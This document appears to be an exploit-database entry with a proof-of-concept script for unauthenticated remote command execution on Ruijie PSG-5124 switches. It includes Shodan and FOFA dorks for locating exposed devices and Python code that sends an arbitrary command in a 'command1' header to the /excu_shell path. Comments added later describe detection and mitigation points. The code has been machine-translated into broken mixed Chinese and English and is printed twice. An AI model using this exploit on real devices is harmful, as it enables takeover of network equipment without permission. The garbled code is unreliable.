#-利用标题: Ruijie Switch PSG-5124 26293-远程代码执行(RCE)
#-Shodan Dork: http.html_hash:-1402735717
#-fofa dork: body='img/free_login_ge.gif'body='。/img/login_bg.gif'
#-利用作者: bittehunter
#-电子邮件:[email protected]
#-版本: PSG-5124(链接软件版本:26293)
#-测试环境: PSG-5124(链接软件版本:26293)
导入http.client
导入argparse
# send_request: sends the single proof-of-concept request for the Ruijie
# PSG-5124 issue named in the page header (software version 26293, per that
# header), then prints the response status and body.
# NOTE(review): this listing has passed through machine translation; keywords,
# identifiers and header names are altered, so it is not valid Python as shown.
#
# Defender-relevant points visible in the code:
#   * The request targets the path /excu_shell.
#   * The command string is carried in a request header ('command1', next to
#     'cmdnum'), not in the URL or a body, so URL-only access logs record just
#     the path. Detection needs request-header logging or inspection in front
#     of the switch's web management interface.
#   * The header dictionary sets no credential, cookie or token, so the
#     request as written is unauthenticated (confirm against the device).
#   * The plain-HTTP connection class of http.client is used, so the traffic
#     is presumably unencrypted and visible to a network sensor.
# Mitigation to consider: limit reachability of the management interface to a
# dedicated management network, and check the vendor for fixed firmware (this
# page names none).
def send_request(IP,端口,命令):
# Header dictionary sent with the request; most entries imitate a browser.
标题={
'host': f'{ip} : {port}',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64; X64; rv:121.0)壁虎/20100101 Firefox/121.0',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8',
'Accept-Language':'En-us,en; q=0.5',
'Accept-ongoding':'Gzip,Deflate,br',
'dnt':'1',
'Connection':'关闭',
'升级- 不肯定- 重新要求':'1',
# The next entries are the non-browser headers, and the ones worth alerting on.
'cmdnum':'1',
'eskenck1':'n',
# A content length of zero is declared: nothing is sent in a request body.
'content-Length':'0',
# The caller's command argument is placed in this header unchanged.
'command1':命令
}
TRY:
连接=http.client.httpconnection(f'{ip} : {port}')
connection.request('get','/excu_shell',标头=标题)
响应=connection.getResponse()
打印(f'status code: {response.status}')
# The response body is decoded as UTF-8 and printed as-is.
print(response.read()。解码('utf-8'))
Connection.Close()
# Any exception raised above is caught and reported on one line; nothing is re-raised.
除异常外,E:
打印(f'request Failed: {e}')
# Script entry point: reads three required command-line arguments (ip, port,
# cmd) and passes them to send_request.
# NOTE(review): machine translation has altered this listing (keywords, option
# names and keyword arguments), so it is not valid Python as shown.
# None of the three values is validated or normalised here; the cmd value is
# forwarded as given.
如果name=='__ -Main __':
parser=argparse.argumentparser(description='ruijie switches rce的概念证明')
parser.add_argument(' - ip',help='目标ip地址',必需=true)
parser.add_argument(' - port',help='port',必需=true)
parser.add_argument(' - cmd',help='命令',必需=true)
args=parser.parse_args()
ip=args.ip
端口=args.port
命令=args.cmd
send_request(IP,端口,命令)
#-Shodan Dork: http.html_hash:-1402735717
#-fofa dork: body='img/free_login_ge.gif'body='。/img/login_bg.gif'
#-利用作者: bittehunter
#-电子邮件:[email protected]
#-版本: PSG-5124(链接软件版本:26293)
#-测试环境: PSG-5124(链接软件版本:26293)
导入http.client
导入argparse
# send_request (second copy): this definition repeats the send_request listing
# that appears earlier on the page; the two copies are identical.
# NOTE(review): this listing has passed through machine translation; keywords,
# identifiers and header names are altered, so it is not valid Python as shown.
#
# It sends one request for the path /excu_shell and prints the response status
# and body. The command string is carried in the 'command1' request header
# (next to 'cmdnum'), so URL-only access logs record just the path; detection
# needs request-header logging or inspection in front of the switch's web
# management interface. The header dictionary sets no credential, cookie or
# token (confirm against the device whether the endpoint requires any).
def send_request(IP,端口,命令):
# Header dictionary sent with the request; most entries imitate a browser.
标题={
'host': f'{ip} : {port}',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64; X64; rv:121.0)壁虎/20100101 Firefox/121.0',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8',
'Accept-Language':'En-us,en; q=0.5',
'Accept-ongoding':'Gzip,Deflate,br',
'dnt':'1',
'Connection':'关闭',
'升级- 不肯定- 重新要求':'1',
# The next entries are the non-browser headers, and the ones worth alerting on.
'cmdnum':'1',
'eskenck1':'n',
# A content length of zero is declared: nothing is sent in a request body.
'content-Length':'0',
# The caller's command argument is placed in this header unchanged.
'command1':命令
}
TRY:
连接=http.client.httpconnection(f'{ip} : {port}')
connection.request('get','/excu_shell',标头=标题)
响应=connection.getResponse()
打印(f'status code: {response.status}')
# The response body is decoded as UTF-8 and printed as-is.
print(response.read()。解码('utf-8'))
Connection.Close()
# Any exception raised above is caught and reported on one line; nothing is re-raised.
除异常外,E:
打印(f'request Failed: {e}')
# Script entry point (second copy): repeats the entry block that appears
# earlier on the page. It reads three required command-line arguments (ip,
# port, cmd) and passes them to send_request without validating them.
# NOTE(review): machine translation has altered this listing (keywords, option
# names and keyword arguments), so it is not valid Python as shown.
如果name=='__ -Main __':
parser=argparse.argumentparser(description='ruijie switches rce的概念证明')
parser.add_argument(' - ip',help='目标ip地址',必需=true)
parser.add_argument(' - port',help='port',必需=true)
parser.add_argument(' - cmd',help='命令',必需=true)
args=parser.parse_args()
ip=args.ip
端口=args.port
命令=args.cmd
send_request(IP,端口,命令)